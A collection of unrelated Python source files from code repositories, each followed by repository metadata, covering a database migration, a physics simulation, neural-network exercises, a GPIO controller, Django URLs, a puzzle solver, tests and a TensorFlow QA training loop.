    sa.Column('changed_at', AwareDateTime(), nullable=False),
    sa.ForeignKeyConstraint(['switch_id'], ['switches.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop the ``switch_history`` table, reversing :func:`upgrade`."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('switch_history')
    # ### end Alembic commands ###
| best-doctor/its_on | db/migrations/versions/b85b82664c28_added_switch_history.py | b85b82664c28_added_switch_history.py | py | 1,108 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integ... |
38075311961 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation as animation
import math
#definindo a classe
class Oscilador:
    """Cube of side ``lado`` oscillating on a spring inside a fluid.

    Reads the module-level globals: g (gravity), rob (block density),
    rof (fluid density), ro (linear drag coefficient), k (spring
    constant), x0 (spring rest position) and dt (time step).
    """
    # Initialization: mass = density * volume of the cube.
    def __init__(self, lado, x, v):
        self.m= rob*(lado**3)
        self.l= lado
        self.x= x
        self.v= v
    # Acceleration: net-weight/buoyancy term + spring restoring force + linear drag.
    # NOTE(review): (rob-rof)*g*l^3/m is the net gravitational minus buoyant
    # force per unit mass — confirm the intended sign convention for x.
    def a(self, x, v):
        return (rob-rof)*g*(self.l**3)/self.m - (k/self.m)*(x-x0) - ro*v/self.m
    # One velocity-Verlet step of size dt; the acceleration is re-evaluated
    # with a provisional velocity because the drag term depends on v.
    def move(self, t):
        at= self.a(self.x, self.v)
        self.x= self.x + self.v*dt + 0.5*at*(dt**2)
        atem= self.a(self.x, self.v)
        vtem= self.v + 0.5*(at+atem)*dt
        atem= self.a(self.x, vtem)
        self.v= self.v + 0.5*(at+atem)*dt
        self.at= self.a(self.x, self.v)
#declaração das variáveis
g= 9.8
lado= 0.1
rob= 8000 #densidade do bloco
rof= 1250 #densidade do fluido
ro= 2 #coeficiente de proporcionalidade
k= 40 #constante elástica
x0= 0.5
dt= 0.1
t= 0
#objeto
o1= Oscilador(lado, 0.51, 0)
#arrays
tmax= 60
t= np.arange(0, tmax, dt)
x= np.zeros(t.size)
v= np.zeros(t.size)
x[0]= o1.x
v[0]= o1.v
for i in range(t.size):
o1.move(t[i])
x[i]= o1.x
v[i]= o1.v
#masterização dos gráficos
fig = plt.figure()
plt.title('Oscilador', fontsize=12)
#gráfico 1
XT=fig.add_subplot(331, xlim=(0, tmax), ylim=(min(x)*1.05, max(x)*1.05))
XT.xaxis.grid(True)
XT.yaxis.grid(True)
plt.setp(XT.get_xticklabels(), visible=False)
plt.xlabel('Tempo (s)')
plt.ylabel('Posicao (m)')
line1, = XT.plot([], [], 'g-', lw=1)
plt.legend(loc='upper right')
#gráfico 2
VT=fig.add_subplot(334, xlim=(0, tmax), ylim=(min(v)*1.05, max(v)*1.05))
VT.xaxis.grid(True)
VT.yaxis.grid(True)
plt.setp(VT.get_xticklabels(), visible=False)
plt.xlabel('Tempo(s)')
plt.ylabel('Velocidade(m/s)')
line2, = VT.plot([], [], 'r-', lw=1)
plt.legend(loc='upper right')
#gráfico 3
VX=fig.add_subplot(122, xlim=(min(x)*1.05, max(x)*1.05), ylim=(min(v)*1.05, max(v)*1.05))
VX.xaxis.grid(True)
VX.yaxis.grid(True)
plt.setp(VX.get_xticklabels(), visible=False)
plt.xlabel('Posicao (m)')
plt.ylabel('Velocidade (m/s)')
line3, = VX.plot([], [], 'b.', lw=0.5)
plt.legend(loc='upper right')
#animação
def init():
    """Blank all three plot lines before the animation starts."""
    for ln in (line1, line2, line3):
        ln.set_data([], [])
    return line1, line2, line3
def animate(i):
    """Frame i: plot x(t), v(t) and the phase portrait v(x) up to index i."""
    line1.set_data(t[:i], x[:i])
    line2.set_data(t[:i], v[:i])
    line3.set_data(x[:i], v[:i])
    return line1, line2, line3
#execução da animação
anim= animation.FuncAnimation(fig, animate, init_func= init, frames= t.size,
interval= 20, blit= True, repeat= False)
#salvar animação
anim.save('oscilador.mp4', fps=30, extra_args=['-vcodec', 'libx264'])
#mostrar animação
plt.show()
| hugosanc/ProjetoFinal | oscilador.py | oscilador.py | py | 2,610 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "numpy.arange",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"... |
2574010068 | from sdv.model import DataPointFloat, Model
class O2WR(Model):
    """O2WR (wide-range oxygen sensor) vehicle-signal model node.

    Attributes
    ----------
    Lambda: sensor
        PID 2x (byte AB) and PID 3x (byte AB) - Lambda for wide range/band oxygen sensor
    Voltage: sensor
        PID 2x (byte CD) - Voltage for wide range/band oxygen sensor
        Unit: V
    Current: sensor
        PID 3x (byte CD) - Current for wide range/band oxygen sensor
        Unit: A
    """
    def __init__(self, name, parent):
        """Create a new O2WR model attached to *parent* in the signal tree."""
        super().__init__(parent)
        self.name = name
        # Leaf data points; each registers this node as its parent.
        self.Lambda = DataPointFloat("Lambda", self)
        self.Voltage = DataPointFloat("Voltage", self)
        self.Current = DataPointFloat("Current", self)
| eclipse-velocitas/vehicle-model-python | sdv_model/OBD/O2WR/__init__.py | __init__.py | py | 744 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sdv.model.Model",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "sdv.model.DataPointFloat",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "sdv.model.DataPointFloat",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "sdv.... |
13337504275 | ##평균 제곱 오차
import numpy as np
def mean_squared_error(y, t):
    """Return half the sum of squared differences between y and t."""
    residual = y - t
    return 0.5 * np.sum(residual * residual)
t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
print(mean_squared_error(np.array(y), np.array(t)))
y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
print(mean_squared_error(np.array(y), np.array(t)))
##교차 엔트로피 오차
import numpy as np
def mean_squared_error2(y, t):
    """Half the sum of squared differences (mean-squared-error loss).

    Args:
        y: network output array.
        t: target array (one-hot encoded labels).
    """
    residual = y - t
    return 0.5 * np.sum(residual ** 2)
def cross_entropy_error(y, t):
    """Cross-entropy of prediction y against one-hot target t.

    A small epsilon keeps log() finite when a predicted probability is 0.
    """
    eps = 1e-7
    return -np.sum(t * np.log(y + eps))
cross_entropy_error(y, t)
y = np.array([0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0])
cross_entropy_error(y, t)
t = np.array([0, 0, 1, 0, 0, 0, 0, 0, 0, 0])
y = np.array([0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0])
##미니 배치 교차 엔트로피
def cross_entropy_error2(y, t):
    """Batch-averaged cross-entropy for one-hot targets (1-D or 2-D input)."""
    if y.ndim == 1:
        # Promote a single sample to a batch of one.
        y = y.reshape(1, y.size)
        t = t.reshape(1, t.size)
    n = y.shape[0]
    return -np.sum(t * np.log(y + 1e-7)) / n
# 정답 레이블이 '2', '7'과 같은 숫자 레이블로 주어진 경우
def cross_entropy_error3(y, t):
    """Batch-averaged cross-entropy when t holds integer class labels
    (e.g. 2 or 7) instead of one-hot vectors."""
    if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)
    n = y.shape[0]
    picked = y[np.arange(n), t]  # probability assigned to the true class
    return -np.sum(np.log(picked)) / n
# 수치 미분
def numerical_diff(f, x):
    """Central-difference approximation of f'(x) with step 1e-4."""
    eps = 1e-4
    return (f(x + eps) - f(x - eps)) / (2 * eps)
x = np.arange(0.0, 20.0, 0.1)
def function_1(x):
    """Demo quadratic 0.01*x^2 + 0.1*x used for the numerical-diff plot."""
    return x * (0.01 * x + 0.1)
y = function_1(x)
import matplotlib.pyplot as plt
plt.xlabel("x")
plt.ylabel("f(x)")
plt.plot(x, y)
plt.show()
#기울기
def numerical_gradient(f, x):
    """Gradient of f at the 1-D array x via central differences.

    x is perturbed in place per coordinate and restored afterwards.
    """
    step = 1e-4
    grad = np.zeros_like(x)
    for pos in range(x.size):
        saved = x[pos]
        x[pos] = saved + step
        f_plus = f(x)
        x[pos] = saved - step
        f_minus = f(x)
        grad[pos] = (f_plus - f_minus) / (2 * step)
        x[pos] = saved  # restore the original coordinate
    return grad
# 차원에 상관없이 반복자를 지정
def numerical_gradient2(f, x):
    """Gradient of f at x for arrays of any dimensionality.

    Visits every element in C order (same order as np.nditer), perturbing
    x in place and restoring it afterwards.
    """
    step = 1e-4
    grad = np.zeros_like(x)
    for idx in np.ndindex(x.shape):
        saved = x[idx]
        x[idx] = float(saved) + step
        f_plus = f(x)
        x[idx] = saved - step
        f_minus = f(x)
        grad[idx] = (f_plus - f_minus) / (2 * step)
        x[idx] = saved  # restore
    return grad
##경사하강법
def gradient_descent(f, init_x, lr=0.01, step_num=100):
    """Minimize f starting at init_x with step_num plain gradient steps.

    Note: init_x is updated in place (numpy ``-=``) and also returned.
    """
    x = init_x
    for _ in range(step_num):
        x -= lr * numerical_gradient(f, x)
    return x
def function_2(x):
    """Sum of squares of the first two components of x (the demo bowl)."""
    return x[0] * x[0] + x[1] * x[1]
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
def softmax(a):
    """Numerically stable softmax: shift by max(a) before exponentiating."""
    shifted = np.exp(a - np.max(a))
    return shifted / np.sum(shifted)
class simpleNet:
    """Minimal one-layer network with a 2x3 Gaussian weight matrix."""

    def __init__(self):
        self.W = np.random.randn(2, 3)  # weights drawn from N(0, 1)

    def predict(self, x):
        """Affine scores x @ W."""
        return np.dot(x, self.W)

    def loss(self, x, t):
        """Cross-entropy of softmax(predict(x)) against target t."""
        scores = self.predict(x)
        return cross_entropy_error(softmax(scores), t)
##신경망 학습
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정
from common.functions import *
from common.gradient import numerical_gradient
class TwoLayerNet:
    """Two-layer (one hidden layer) fully-connected classifier.

    Weights live in ``self.params``; gradients come either from central
    differences (``numerical_gradient``, slow, for gradient checks) or
    from backprop (``gradient``).  Relies on ``sigmoid``/``softmax``/
    ``cross_entropy_error``/``sigmoid_grad`` from common.functions and
    ``numerical_gradient`` from common.gradient.
    """
    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        # Weight initialization: small Gaussian weights, zero biases.
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)
    def predict(self, x):
        """Forward pass: affine -> sigmoid -> affine -> softmax."""
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        return y
    # x: input data, t: target labels (one-hot)
    def loss(self, x, t):
        """Cross-entropy loss of the prediction for x against t."""
        y = self.predict(x)
        return cross_entropy_error(y, t)
    def accuracy(self, x, t):
        """Fraction of rows whose argmax prediction matches the one-hot target."""
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy
    # x: input data, t: target labels
    def numerical_gradient(self, x, t):
        """Loss gradients by central differences (slow; for gradient checks).

        NOTE: the bare name ``numerical_gradient`` in the body resolves to
        the module-level function imported from common.gradient, not to
        this method — intentional in the book's code, but easy to misread.
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads
    def gradient(self, x, t):
        """Loss gradients via backpropagation (fast path used for training)."""
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        grads = {}
        batch_num = x.shape[0]
        # forward
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        # backward: softmax + cross-entropy gives (y - t) / N at the output.
        dy = (y - t) / batch_num
        grads['W2'] = np.dot(z1.T, dy)
        grads['b2'] = np.sum(dy, axis=0)
        da1 = np.dot(dy, W2.T)
        dz1 = sigmoid_grad(a1) * da1
        grads['W1'] = np.dot(x.T, dz1)
        grads['b1'] = np.sum(dz1, axis=0)
        return grads
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정
import numpy as np
import matplotlib.pyplot as plt
from dataset.mnist import load_mnist
from two_layer_net import TwoLayerNet
# 데이터 읽기
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
# 하이퍼파라미터
iters_num = 10000 # 반복 횟수를 적절히 설정한다.
train_size = x_train.shape[0]
batch_size = 100 # 미니배치 크기
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []
# 1에폭당 반복 수
iter_per_epoch = max(train_size / batch_size, 1)
for i in range(iters_num):
# 미니배치 획득
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 기울기 계산
#grad = network.numerical_gradient(x_batch, t_batch)
grad = network.gradient(x_batch, t_batch)
# 매개변수 갱신
for key in ('W1', 'b1', 'W2', 'b2'):
network.params[key] -= learning_rate * grad[key]
# 학습 경과 기록
loss = network.loss(x_batch, t_batch)
train_loss_list.append(loss)
# 1에폭당 정확도 계산
if i % iter_per_epoch == 0:
train_acc = network.accuracy(x_train, t_train)
test_acc = network.accuracy(x_test, t_test)
train_acc_list.append(train_acc)
test_acc_list.append(test_acc)
print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))
# 그래프 그리기
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
| hongjw1938/machine_learning_study | python_class/deep_learning/deep learning from scratch/neural_network_04.py | neural_network_04.py | py | 7,961 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.sum",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 29,
... |
28404000694 | import os
import pandas as pd
import sqlalchemy
#Definindo uma string de conexão
str_connection = 'sqlite:///{path_to_data}'
# Os endereços do projeto e sub-pastas
BASE_DIR = os.path.dirname( os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR,'data')
# Encontrando os arquivos de dados
files_names = [i for i in os.listdir(DATA_DIR) if i.endswith('.csv')]
# Abrindo uma conexão com o banco...
connection = sqlalchemy.create_engine(str_connection.format(path_to_data = os.path.join(DATA_DIR, 'olist.db')))
# Para cada Arquivo é realizado uma inserção no banco
for i in files_names:
df_tmp = pd.read_csv(os.path.join (DATA_DIR, i))
table_name = "tb_" + i.strip(".csv").replace("olist_", "").replace("_dataset","")
df_tmp.to_sql(table_name, connection) | esrodrigues01/Projetos-em-Python | src/upload_data_local.py | upload_data_local.py | py | 802 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
4017006848 | """Controller class file."""
from gpiozero import Button
from time import sleep
class Controller(object):
def __init__(self, up_pin: int, down_pin: int, left_pin: int, right_pin: int, back_pin: int, enter_pin: int):
"""
Initialize controller.
:param up_pin: pin controlling the UP button
:param down_pin: pin controlling the DOWN button
:param left_pin: pin controlling the LEFT button
:param right_pin: pin controlling the RIGHT button
:param back_pin: pin controlling the BACK button
:param enter_pin: pin controlling the ENTER button
"""
self.up = Button(up_pin)
self.down = Button(down_pin)
self.left = Button(left_pin)
self.right = Button(right_pin)
self.back = Button(back_pin)
self.enter = Button(enter_pin)
def get_input(self) -> str:
"""
Get user's input on the controller.
:return: string indicating the user's input. Possible values are "UP", "DOWN", "LEFT", "RIGHT", "BACK", "ENTER"
"""
while True:
if self.up.is_pressed:
return "UP"
elif self.down.is_pressed:
return "DOWN"
elif self.left.is_pressed:
return "LEFT"
elif self.right.is_pressed:
return "RIGHT"
elif self.back.is_pressed:
return "BACK"
elif self.enter.is_pressed:
return "ENTER"
sleep(0.01)
| Marten-M/GAGMehhatroonikaklubi | src/classes/chessrobot/controller/controller.py | controller.py | py | 1,521 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gpiozero.Button",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
... |
32184257693 | import sys
import asyncio
from aioconsole import ainput
async def input_loop(loop):
while True:
input_ = await ainput(loop=loop)
if input_ == "@end":
sys.exit(0)
print(f"Echo: {input_}")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(input_loop(loop))
| metamarcdw/async-interface | test.py | test.py | py | 338 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "aioconsole.ainput",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 13,
"usage_type": "call"
}
] |
2417852779 | """Auth urls."""
from django.urls import path
from apps.vmc_auth import views
app_name = "auth"
urlpatterns = [
path("accounts/signup/", views.signup, name="signup"),
# path("accounts/signin/", views.signin, name="signin"),
path("accounts/signin/", views.LoginView.as_view(), name="signin"),
path("accounts/signin/#signin-modal", views.signin, name="signin_modal"),
path("accounts/profile/", views.ProfileView.as_view(), name="profile"),
path("accounts/signout", views.user_logout, name="signout"),
path(
"accounts/profile/delete/<int:pk>/",
views.DeleteAccount.as_view(),
name="delete_account",
),
]
| dje-1000111/bacasand | apps/vmc_auth/urls.py | urls.py | py | 659 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "apps.vmc_auth.views.signup",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "apps.vmc_auth.views",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dja... |
71968934434 | import telebot
from telebot import types
bot = telebot.TeleBot('')
@bot.message_handler(commands=['start'])
def start(message):
mess = f'Привет, <b>{message.from_user.first_name} {message.from_user.last_name}</b>'
bot.send_message(message.chat.id, mess, parse_mode='html')
@bot.message_handler(commands=['website'])
def website(message):
markup = types.InlineKeyboardMarkup()
markup.add(types.InlineKeyboardButton("Посетить веб сайт", url="https://hestiamaks.ml"))
bot.send_message(message.chat.id, "Перейдите на сайт!", reply_markup=markup)
@bot.message_handler(commands=['help'])
def website(message):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
website = types.KeyboardButton('Веб сайт')
start = types.KeyboardButton('Старт')
markup.add(website, start)
bot.send_message(message.chat.id, "Перейдите на сайт!", reply_markup=markup)
@bot.message_handler(content_types=['text'])
def get_user_text(message):
if message.text == "Hello":
bot.send_message(message.chat.id, "И тебе привет!", parse_mode='html')
elif message.text == "Id":
bot.send_message(message.chat.id, f"Твой ID:{message.from_user.id}", parse_mode='html')
else:
bot.send_message(message.chat.id, "мне не понятно!", parse_mode='html')
bot.polling(none_stop=True)
| markess/hestiamaks | tgbot.py | tgbot.py | py | 1,426 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "telebot.TeleBot",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "telebot.types.InlineKeyboardMarkup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "telebot.types",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "teleb... |
37276683325 | """
--- Day 13: Knights of the Dinner Table ---
In years past, the holiday feast with your family hasn't gone so well. Not everyone gets along! This year, you resolve,
will be different. You're going to find the optimal seating arrangement and avoid all those awkward conversations.
You start by writing up a list of everyone invited and the amount their happiness would increase or decrease if they
were to find themselves sitting next to each other person. You have a circular table that will be just big enough to fit
everyone comfortably, and so each person will have exactly two neighbors.
For example, suppose you have only four attendees planned, and you calculate their potential happiness as follows:
Alice would gain 54 happiness units by sitting next to Bob.
Alice would lose 79 happiness units by sitting next to Carol.
Alice would lose 2 happiness units by sitting next to David.
Bob would gain 83 happiness units by sitting next to Alice.
Bob would lose 7 happiness units by sitting next to Carol.
Bob would lose 63 happiness units by sitting next to David.
Carol would lose 62 happiness units by sitting next to Alice.
Carol would gain 60 happiness units by sitting next to Bob.
Carol would gain 55 happiness units by sitting next to David.
David would gain 46 happiness units by sitting next to Alice.
David would lose 7 happiness units by sitting next to Bob.
David would gain 41 happiness units by sitting next to Carol.
Then, if you seat Alice next to David, Alice would lose 2 happiness units (because David talks so much), but David would
gain 46 happiness units (because Alice is such a good listener), for a total change of 44.
If you continue around the table, you could then seat Bob next to Alice (Bob gains 83, Alice gains 54). Finally, seat
Carol, who sits next to Bob (Carol gains 60, Bob loses 7) and David (Carol gains 55, David gains 41).
The arrangement looks like this:
+41 +46
+55 David -2
Carol Alice
+60 Bob +54
-7 +83
After trying every other seating arrangement in this hypothetical scenario, you find that this one is the most optimal,
with a total change in happiness of 330.
What is the total change in happiness for the optimal seating arrangement of the actual guest list?
--- Part Two ---
In all the commotion, you realize that you forgot to seat yourself. At this point, you're pretty apathetic toward the
whole thing, and your happiness wouldn't really go up or down regardless of who you sit next to. You assume everyone
else would be just as ambivalent about sitting next to you, too.
So, add yourself to the list, and give all happiness relationships that involve you a score of 0.
What is the total change in happiness for the optimal seating arrangement that actually includes yourself?
"""
from itertools import permutations
def parse(data: [str]) -> (dict, set):
scores = {}
people = set()
for line in data:
person1, _, way, units, person2 = line[:-1].replace("happiness units by sitting next to ", "").split(" ")
people.add(person1)
people.add(person2)
scores[(person1, person2)] = int(units) if way == "gain" else int(units) * -1
scores[(person1, "Me")] = 0
scores[("Me", person1)] = 0
scores[(person2, "Me")] = 0
scores[("Me", person2)] = 0
return (scores, people)
def calc_happiness() -> int:
chairs = len(people)
happiness = []
for perm in permutations(people):
change = 0
for i in range(chairs):
j = i + 1
if j >= chairs:
j = 0
person1 = perm[i]
person2 = perm[j]
score1 = scores[(person1, person2)]
score2 = scores[(person2, person1)]
change += score1 + score2
happiness.append(change)
return max(happiness)
#
#
inputdata = open("input.data").read().strip().splitlines()
scores, people = parse(inputdata)
print("Part 1:", calc_happiness())
people.add("Me")
print("Part 2:", calc_happiness())
| ochelset/advent-of-code | 2015/Day 13/13.py | 13.py | py | 4,022 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "itertools.permutations",
"line_number": 73,
"usage_type": "call"
}
] |
44032736509 | from __future__ import annotations
import pytest
from mocksafe import MockProperty, mock, stub, that
class Philosopher:
@property
def meaning_of_life(self: Philosopher) -> str:
return "42"
def test_mock_getter_prop():
mock_meaning: MockProperty[str] = MockProperty("")
philosopher: Philosopher = mock(Philosopher)
stub(philosopher).meaning_of_life = mock_meaning
with pytest.raises(TypeError):
stub(philosopher).meaning_of_life = MockProperty(123)
with pytest.raises(AttributeError):
stub(philosopher).foobar = mock_meaning
assert philosopher.meaning_of_life == ""
mock_meaning.return_value = (
"Try and be nice to people, avoid eating fat, "
"read a good book every now and then, get "
"some walking in, and try and live together "
"in peace and harmony with people of all "
"creeds and nations."
)
assert "be nice" in philosopher.meaning_of_life
assert "live together in peace" in philosopher.meaning_of_life
assert that(mock_meaning).was_called
assert that(mock_meaning).num_calls == 3
assert that(mock_meaning).last_call == ()
| dmayo3/mocksafe | tests/test_props.py | test_props.py | py | 1,167 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "mocksafe.MockProperty",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "mocksafe.mock",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "mocksafe.stub",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
... |
24782913768 |
import sys
import time
import numpy as np
import logging
import tensorflow as tf
from os.path import join as pjoin
from tqdm import tqdm
from evaluate import f1_score, exact_match_score
class QaSystemSolver(object):
def __init__(self, model, dataset, answers, raw_answers, rev_vocab, **kwargs):
self.model = model
self.dataset = dataset
self.answers = answers
self.raw_answers = raw_answers
self.rev_vocab = rev_vocab
self.batch_size = kwargs.pop('batch_size', 64)
self.start_lr = kwargs.pop('start_lr', 0.0001)
self.epochs = kwargs.pop('epochs', 5)
self.start_steps = kwargs.pop('start_steps', 0)
self.print_every = kwargs.pop('print_every', 1000)
self.save_every = kwargs.pop('save_every', 1000)
self.save_every_epoch = kwargs.pop('save_every_epoch', True)
self.sample = kwargs.pop('sample', 0)
self.debug_num = kwargs.pop('debug_num', 0)
self.max_grad_norm = kwargs.pop('max_grad_norm', 5.0)
self.opt = kwargs.pop('opt', 'adam')
self.train_dir = kwargs.pop('train_dir', 'output/train')
self.summary_dir = kwargs.pop('summary_dir', 'output/tensorboard/summary')
if self.opt == "adam":
self.optimizer = tf.train.AdamOptimizer
self.global_step = tf.Variable(self.start_steps, trainable=False)
self.starter_learning_rate = tf.placeholder(tf.float32, name='start_lr')
def train(self):
tic = time.time()
params = tf.trainable_variables()
num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))
toc = time.time()
logging.info("Number of params: %d (retreival took %f secs)" % (num_params, toc - tic))
# train_context -> (num, 2, max_length)
train_context = np.array(self.dataset['train_context'])
train_question = np.array(self.dataset['train_question'])
# train_answer -> (num, 2)
train_answer = np.array(self.answers['train_answer'])
if self.debug_num:
assert isinstance(self.debug_num, int), 'the debug number should be a integer'
assert self.debug_num < len(train_answer), 'check debug number!'
train_answer = train_answer[0:self.debug_num]
train_context = train_context[0:self.debug_num]
train_question = train_question[0:self.debug_num]
print_every = 5
num_example = len(train_answer)
logging.info('num example is {}'.format(num_example))
shuffle_list = np.arange(num_example)
learning_rate = tf.train.exponential_decay(self.starter_learning_rate, self.model.global_step,
1000, 0.9, staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
with tf.name_scope('optimizer'):
optimizer = self.optimizer(learning_rate)
grad_var = optimizer.compute_gradients(self.model.final_loss)
grad = [i[0] for i in grad_var]
var = [i[1] for i in grad_var]
grad_norm = tf.global_norm(grad)
tf.summary.scalar('grad_norm', grad_norm)
grad, use_norm = tf.clip_by_global_norm(grad, self.max_grad_norm)
train_op = optimizer.apply_gradients(zip(grad, var), global_step=self.model.global_step)
saver = tf.train.Saver()
merged = tf.summary.merge_all()
losses = []
norms = []
train_evals = []
val_evals = []
iters = self.start_steps
save_path = pjoin(self.train_dir, 'weights')
batch_size = self.batch_size
batch_num = int(num_example * 1.0 / batch_size)
total_iterations = self.epochs * batch_num + self.start_steps
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
train_writer = tf.summary.FileWriter(self.summary_dir + str(self.start_lr),
sess.graph)
tic = time.time()
for ep in range(self.epochs):
np.random.shuffle(shuffle_list)
train_context = train_context[shuffle_list]
train_question = train_question[shuffle_list]
train_answer = train_answer[shuffle_list]
logging.info('training epoch ---- {}/{} -----'.format(ep + 1, self.epochs))
ep_loss = 0.
for it in xrange(batch_num):
sys.stdout.write('> %d / %d \r' % (iters % print_every, print_every))
sys.stdout.flush()
context = train_context[it * batch_size: (it + 1) * batch_size]
question = train_question[it * batch_size: (it + 1) * batch_size]
answer = train_answer[it * batch_size: (it + 1) * batch_size]
input_feed = self.load_input_feed(context, question, answer)
batch_final_loss = self.model.final_loss
summary, _, loss, grad_norm= sess.run([merged, train_op, batch_final_loss, grad_norm], input_feed)
train_writer.add_summary(summary, iters)
ep_loss += loss
losses.append(loss)
norms.append(grad_norm)
iters += 1
if iters % print_every == 0:
toc = time.time()
logging.info('iters: {}/{} loss: {} norm: {}. time: {} secs'.format(
iters, total_iterations, loss, grad_norm, toc - tic))
tf1, tem, f1, em = self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=self.sample)
train_evals.append((tf1, tem))
val_evals.append((f1, em))
tic = time.time()
if iters % self.save_every == 0:
saver.save(sess, save_path, global_step=iters)
self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=self.sample)
if self.save_every_epoch:
saver.save(sess, save_path, global_step=iters)
self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=4000)
